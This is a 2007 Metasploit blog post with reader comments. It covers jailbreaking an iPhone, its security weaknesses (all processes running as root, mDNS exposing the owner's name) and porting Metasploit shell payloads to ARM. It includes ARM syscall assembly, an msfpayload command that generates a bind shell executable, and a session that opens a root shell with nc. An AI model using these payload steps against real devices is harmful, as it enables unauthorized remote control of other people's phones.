Metasploit: A root shell in my pocket (and maybe yours)
Official blog of the Metasploit Project
Tuesday, September 25, 2007
A root shell in my pocket (and maybe yours)
After the recent price drop and toolchain release, I bit the bullet and bought a shiny new iPhone. The first thing I did was bypass activation, run jailbreak, and install the AppTapp Installer. Using the installer, I added OpenSSH and a VT-100 Terminal to the phone. Once I had shell access, I made a few observations:

1) The processor is actually decent. Compare the iPhone (400MHz*) with the Nokia n770 (233MHz) or the Nokia n800 (320MHz) and the choice of a handheld hacking device is a no-brainer. The (mostly) working toolchain, large amounts of storage (8Gb), and ease of use make this a great candidate for almost any security researcher "on-the-go". If you tweak the networking preferences file, you can set the signal quality limit down to "1", turning the "join a WiFi network" screen into a primitive stumbler (or just install Stumbler via AppTapp).

* The media widely reported the processor speed as 620MHz and I repeated it here. Dan Moniz suggested I check the output of ioreg for the actual CPU speed, which is reported as 400MHz (the raw bytes 0084d717, read as a little-endian value, are 0x17d78400 == 400000000).

2) EDGE network access is horribly slow, but it works. The downside is that the EDGE network gives the phone a private address, on a point-to-point link, that is three hops away from a public IP range. For example, my phone's EDGE address is 10.x.x.x, its first hop is 172.16.x.x, its second hop is 10.x.x.x, and its third hop is also 10.x.x.x. The fourth hop is a 200.x.x.x address. Latency is between 180ms and 600ms, but averages around 200ms-250ms. I made a few attempts to discover other hosts in the private address space, hoping to find other EDGE devices, but instead only found a few scattered routers, switches, and servers.

The phone has been a fun time sink. I used the MobileSafari PDF viewer to read all of the recent Uninformed Journal articles. Metasploit 2 runs decently, even though the Terminal isn't the best interface for a screen of this size. Metasploit 3 should run as soon as the toolchain is capable of building a working Ruby interpreter (yes, there is a Ruby package in AppTapp; yes, it's totally broken). When that day comes, I hope the EDGE network can handle it :-)

Having a network-enabled root shell in my pocket is great, but being able to pop a root shell on someone else's iPhone is even better. A few things to keep in mind:

1) Every process runs as root. MobileSafari, MobileMail, even the Calculator, all run with full root privileges. Any security flaw in any iPhone application can lead to a complete system compromise. A rootkit takes on a whole new meaning when the attacker has access to the camera, microphone, contact list, and phone hardware. Couple this with "always-on" internet access over EDGE and you have a perfect spying device.

2) The mDNSResponder service runs by default. This service is also known by the names Bonjour, ZeroConf, and Rendezvous. When the iPhone is first sync'ed with iTunes, the hostname is changed. The default hostname becomes "User's iPhone", where "User" is the Mac OS X user account used to perform the sync. If the iPhone is connected to a WiFi network, the mDNS service will advertise itself on the local network, exposing the user name of the iPhone's owner. So far, it doesn't look like the mDNS service responds to normal probes, so at least active discovery is less likely (maybe the sysctl parameter net.inet.udp.no_5353=1 has something to do with it).

3) The MobileMail application supports Microsoft Office document formats. It does this by using the OfficeImporter framework to convert these documents into a viewable form. This looks like a great target for file-format fuzzing and some late night reverse engineering.

4) Independent Security Evaluators demonstrated a code-execution vulnerability in the iPhone at Black Hat 2007. Their slides describe the exploit and shellcode development process. Since then, the toolchain and the amount of public information have improved considerably.

The first step to iPhone exploits is platform support for the Metasploit Framework. To support a new platform, the architecture must be defined in rex/constants.rb. I added two new architectures, one for ARM little endian (armle) and another for ARM big endian (armbe), since many ARM chips can run in either mode.

The next step is to figure out the payloads. Fortunately, I wrote many of Metasploit's PowerPC modules for Mac OS X. The iPhone uses the same syscall numbers, so porting payloads is straightforward. On Mac OS X PowerPC, the system call number is placed into r0 and the arguments start at register r3. On the iPhone, the system call number is placed into r12 and the arguments start at r0. For example, the "exit" system call on PowerPC looks like:

    li r0, 1      ; SYS_exit
    li r3, 255    ; Exit code 255
    sc            ; System call

By comparison, the same code on the iPhone looks like:

    mov r12, #1   ; SYS_exit
    mov r0, #255  ; Exit code 255
    swi 128       ; System call

With only a few headaches, I was able to port the bind shell and reverse shell payloads to the iPhone. I added a very simple nop generator to match. At this point, it's possible to generate working iPhone shellcode using the trunk version of Metasploit 3. For kicks, I rewrote Charlie Miller's "vibrate" shellcode (listed in the ISE slides) as well. The Metasploit version is a little bit smaller and uses the correct address for Firmware 1.02. The next step is to finish my XOR (well, EOR on ARM) encoder and start playing with thumb mode (16 bit instructions).

Since shellcode is no fun unless you can do something with it, I added support for iPhone executables to the msfpayload command. This allows you to generate stand-alone bind/reverse shell executables using the following syntax:

    $ msfpayload osx/armle/shell_bind_tcp LPORT=4444 X > iphone_bindshell.bin

This binary can be copied to the iPhone using SSH or iPHUC/iPhoneTool and executed.

    $ ssh root@192.168.0.125
    # chmod +x iphone_bindshell.bin
    # ./iphone_bindshell.bin
    ---
    $ nc -vvn 192.168.0.125 4444
    (UNKNOWN) [192.168.0.125] 4444 (krb524) open
    id
    uid=0 euid=1 gid=0(wheel) groups=0(wheel)
    uname -a
    Darwin Metasploit Developer's iPhone 9.0.0d1 Darwin Kernel Version 9.0.0d1: Fri Jun 22 00:38:56 PDT 2007; root:xnu-933.0.1.178.obj~1/RELEASE_ARM_S5L8900XRB iPhone1,1 Darwin

Once the XOR encoder is done, the only step left is to find the bugs and write the exploits :-)
posted by hdm at 8:28 PM
15 Comments:
Anonymous said...
Nice One :)
7:38:00 AM
mokum von Amsterdam said...
Darn smart! Your contribution will surely help the iPhone dev-team and who knows, even inspire some other smarties to assist in the hunting. Thanks!
11:32:00 AM
Anonymous said...
you f^cking Rock!!! Can't wait to see the versions develop.
2:45:00 PM
Anonymous said...
hd, got to say it: metasploit rocks. Just curious why you were not part of the new syngress metasploit book. Do you have something coming out book wise, or is that what the documentation is for? ;) good stuff
3:08:00 AM
hdm said...
Regarding the Syngress book on Metasploit -- we chose not to be part of the project for quite a few reasons. The biggest one is the fact that Metasploit was (and is) a moving target. Syngress wanted to start writing the book while we were transitioning between 2.7 and 3.0. The book they released this week has over half of its content dedicated to an obsolete version of the Framework. Personally, I am not a fan of Syngress's style, quality, editing skills, or marketing abilities. We DO have a community book that is in the works and any help you want to provide would be useful: http://en.wikibooks.org/wiki/Metasploit
7:00:00 AM
n800_User said...
Actually, n800 is a hacker's choice :) Of course 330MHz is smaller than 400. Actually in n800 there is a way to use 400 too BUT then the second DSP core should be down-clocked, sort of a trade-off. But 330 MHz is pretty enough to have a bunch of fun. What can n800 do?
- The screen is 800x480. A way better for the web. And for entering text to the terminals :)
- EDGE\3G goes via external device and can be a way better than EDGE.
- Wi-Fi is both fast and consumes very small power in idle mode while keeping the link alive.
- Great bluetooth connectivity. Low powered as well and yes, it copes with dozens of connections easily.
- Dozens of tools are ported. Like nmap, kismet, aircrack, curl\wget, ... and much more. Due to the official SDK which makes porting just a joke :)
- You can even wardrive using gpsd to learn what and where.
- There is openvpn to get to anywhere. No matter you're using EDGE and a lame local IP, etc.
- There is even nginx and php-fastcgi so your server is with you :)
- Bluetooth utils to ... er... to audit these remote devices :)
- Real mc filemanager, sshing to your pocket and dealing with files on the device and its cards is real fun.
- TCPDump allows you to know what's going on.
- Some GUI fun. On n800 you can run full-featured Linux apps. Like mplayer to watch, let's say, a .FLV file. Or Pidgin to chat via ICQ, MSN, Jabber. Or maybe xchat to hang on IRC. Or MaemoMapper to navigate via maps like google streets, optionally using a GPS receiver. Some VNC and RemoteDesktop fun as well. You're ruling your world :-). Decent VoIP features. Including SIP (a whole dozen of operators like Gizmo) and Skype. MythTV is also here. And well, it runs Firefox. To be exact, a reduced version of the great browser based on Gecko 1.9. Yes, this Gecko is a beta which will be used by Firefox 3, but even today it can easily beat any other pocket browser just jokingly (on Ajax-based sites, or YouTube, he-he).
- We can mess with our OS as we wish. If we want to, we can rebuild the kernel and other parts like initfs. Allowing the device to boot up from cards, have unusual kernel features not available out of the box (like various filesystems support added, or advanced SDHC patches for fast speeds, or whatever else the kernel does).
What can n800 not do?
- It can't be a cell phone. Yes. Kinda unique for Nokia. But in exchange you're getting FREEDOM. The device is not locked to any carrier. No strings attached. No restrictions. Nothing crippled. Real Debian Linux inside. You can even apt-get something instead of using the app manager, the result is the same :-). You're getting a real unrestricted pocket computer from the beginning. iPhone is just a dialer and player by design. So you're hacking to take your rights and Apple can always stop you with updates. We're using our rights. Nokia will not stop us. Because their device was created to be FREE and give you some FREEDOM.
- Yes, n800 can not limit you as well. It's perfectly hackable. You do not have to fight with dumb barriers. You do not have to be afraid of updates. Just have fun :-)
- And yes, n800 can't be such a buzzword. It is rather intended for thinking people while iPhone is a dumb dialer with player targeted at dumb people by design (so it is a way more restrictive without hacking). Of course you can break'n'enter. But Apple may decide to prevent "homebrew" apps with updates. So this way can be just a headache. As for me, it looks like some people are not seeking the simple way but rather their own. That's good, too.
ARM shellcode... users should tremble since there are so many ARM devices today =). Great work! Did I mention ARM asm rocks compared to x86 one? ;)
3:57:00 PM
Anonymous said...
Amazing job HDM.Having a network-based root shell in my pocket does feel good, especially after reading your blog.
5:05:00 AM
Matthew said...
it's people like you who fuck it up for the rest of us.... get a life beyond trying endlessly to hack into other people's phones... hey, there is a knock on the door, mom wants her basement back and she wants you to join the human world. Anarchy is a pain in the ass, you asswipe. If you have any ego, you will answer to this rather than delete.. which I assume you will..
10:20:00 AM
hdm said...
Matthew, it's people like you who make this all worthwhile :-)
12:01:00 PM
Anonymous said...
as ceo of apple...i would hire you instantly:)
3:10:00 PM
rd said...
nice work bro :) I agree with n800_User tho .. n800 is a better choice for a handheld hacking device.
3:48:00 AM
Anonymous said...
i have been thinking about getting an n800 or maybe the n810, or maybe the Asus Eee - but I am coming from my trustworthy zaurus sl-5500 that I have had many years. My problem is, the zaurus is old and maybe a little slower, but it does everything I want it to do with auditing/pen testing....I did get metasploit up to 2.7 to work on it, but could never get 3 to work - lots of info on it at edwiget.name if anyone finds this useful. I never could find any gps + cable or 10/100 ethernet card for it...but wireless works great. I love the zaurus so much, I would love to trick it out with all its options and then just put it away....so if anyone has any stuff for it...contact me.
12:20:00 AM
Adam said...
Matthew, did you just throw insults at the legendary HDM? I don't think you even realize what you've just done. It's actually quite the opposite: it's better that a credible person such as HD finds this stuff out so something can be done about it, rather than the people who really want to do damage..
3:46:00 PM
M@DL0G!K said...
Matthew: ignorance is not safe. Computers are by design flawed... they need to know what to run. And there will always be people that want/need to know what's going on under the hood. And thank God, else you would throw away anything that stops working! And what about making something work better / making it more capable... well if it can be done (like jailbreaking the ipod touch/iphone) then IT SHOULD BE DONE! (ie: Apple, as soon as you heard of installer.app, you should have bought them big time and provided the solution... but that's not getting money in, so f*ck it! .... .... .... ... money... ... yeah .. ) ... enough said about that! HD: great article! I need to know something: you talk about modifying the "network preference file" to allow for weaker networks to pop up .. humm .. do you mind doing a tutorial on that? I couldn't find this info on google! Thanks! -Madlogik
2:29:00 PM
Anonymous coward said...
/private/var/preferences/SystemConfiguration/com.apple.wifi.plist
3:32:00 AM